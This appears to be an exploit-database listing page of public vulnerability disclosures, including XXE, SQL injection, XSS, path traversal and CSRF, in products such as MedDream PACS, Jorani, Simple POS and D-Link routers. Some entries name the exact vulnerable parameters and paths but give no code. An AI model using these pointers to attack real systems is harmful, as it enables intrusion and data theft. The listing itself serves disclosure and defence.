Exploitdb Exploits
31,364 exploits tracked across all sources.
Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
by hyp3rlinx
Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
by Carlos Avila
MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection
by Carlos Avila
Tenable WAS-Scanner 7.4.1708 - Remote Command Execution
by Sameer Goyal
Qnap Photo Station < 5.7.0 - XSS
Cross-site scripting vulnerability in QNAP Photo Station versions 5.7.0 and earlier could allow remote attackers to inject Javascript code in the compromised application.
by Mitsuaki Shiraishi
CVSS 6.1
NovaRad NovaPACS Diagnostics Viewer <8.5.19.75 - XXE Injection
NovaRad NovaPACS Diagnostics Viewer 8.5.19.75 contains an unauthenticated XML External Entity (XXE) injection vulnerability in XML preference import settings. Attackers can craft malicious XML files with DTD parameter entities to retrieve arbitrary system files through an out-of-band channel attack.
by LiquidWorm
CVSS 9.8
Jorani - XSS
Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.
by Javier Olmedo
CVSS 5.4
Jorani - SQL Injection
An issue was discovered in Jorani 0.6.5. SQL Injection (error-based) allows a user of the application without permissions to read and modify sensitive information from the database used by the application via the startdate or enddate parameter to leaves/validate.
by Javier Olmedo
CVSS 5.4
Endress Wirelesshart Fieldgate Swg70 Firmware - Path Traversal
Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.
by Hamit CİBO
CVSS 5.3
Tenda D152 - XSS
Tenda D152 ADSL routers allow XSS via a crafted SSID.
by Sandip Dey
CVSS 5.4
Logicspice FAQ Script <2.9.7 - Command Injection
Logicspice FAQ Script 2.9.7 allows uploading arbitrary files, which leads to remote command execution via admin/faqs/faqimages with a .php file.
by AkkuS
CVSS 7.2
Simple POS 4.0.24 - SQL Injection
Simple POS 4.0.24 allows SQL Injection via a products/get_products/ columns[0][search][value] parameter in the management panel, as demonstrated by products/get_products/1.
by Renos Nikolaou
CVSS 9.8
Online Quiz Maker 1.0 SQL Injection via catid Parameter
Online Quiz Maker 1.0 contains SQL injection vulnerabilities in the catid and usern parameters that allow authenticated attackers to execute arbitrary SQL commands. Attackers can submit malicious POST requests to quiz-system.php or add-category.php with crafted SQL payloads in POST parameters to extract sensitive database information or bypass authentication.
by AkkuS
CVSS 7.1
Fspro Event Log Explorer - XXE
FsPro Labs Event Log Explorer 4.6.1.2115 has ".elx" FileType XML External Entity Injection.
by hyp3rlinx
CVSS 3.3
Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)
by Nawaf Alkeraithe
Dlink Dir-615 Firmware - Memory Corruption
D-Link DIR-615 devices have a buffer overflow via a long Authorization HTTP header.
by Aniket Dinda
CVSS 9.8
Damicms - CSRF
An issue was discovered in DamiCMS 6.0.0. There is an CSRF vulnerability that can revise the administrator account's password via /admin.php?s=/Admin/doedit.
by Autism_JH
CVSS 8.8
WordPress Quizlord <2.0 - XSS
The Quizlord plugin through 2.0 for WordPress is prone to Stored XSS via the title parameter in a ql_insert action to wp-admin/admin.php.
by Renos Nikolaou
CVSS 5.4
Jibu Pro <1.7 - XSS
The Jibu Pro plugin through 1.7 for WordPress is prone to Stored XSS via the wp-content/plugins/jibu-pro/quiz_action.php name (aka Quiz Name) field.
by Renos Nikolaou
CVSS 5.4
Cybrotech Cybrohttpserver - Path Traversal
Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal via a ../ in the URI.
by Emre ÖVÜNÇ
CVSS 5.3
By Source